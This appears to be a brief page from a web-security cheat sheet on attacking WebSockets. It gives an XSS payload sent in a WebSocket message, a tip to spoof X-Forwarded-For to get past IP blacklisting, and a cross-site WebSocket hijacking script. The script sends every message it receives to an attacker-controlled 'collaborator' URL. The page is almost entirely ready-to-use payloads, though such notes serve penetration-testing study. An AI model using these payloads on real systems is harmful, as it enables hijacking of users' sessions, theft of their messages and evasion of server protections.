Websockets

Manipulating Websocket to exploit Vulnerabilities | {"message":"<img src=1 onerror='alert(1)'>"}
In case the server Blacklists You by filtering Websocket attack | use X-Forwarded-For {ip} to ublock the chat back
Cross Site Websocket hijacking

<script>
    var ws = new WebSocket('wss://your-websocket-url');
    ws.onopen = function() {
        ws.send("READY");
    };
    ws.onmessage = function(event) {
        fetch('<https://your-collaborator-url>', {method: 'POST', mode: 'no-cors', body: event.data});
    };
</script>

PreviousClickjacking NextCSRF

Last updated 4 months ago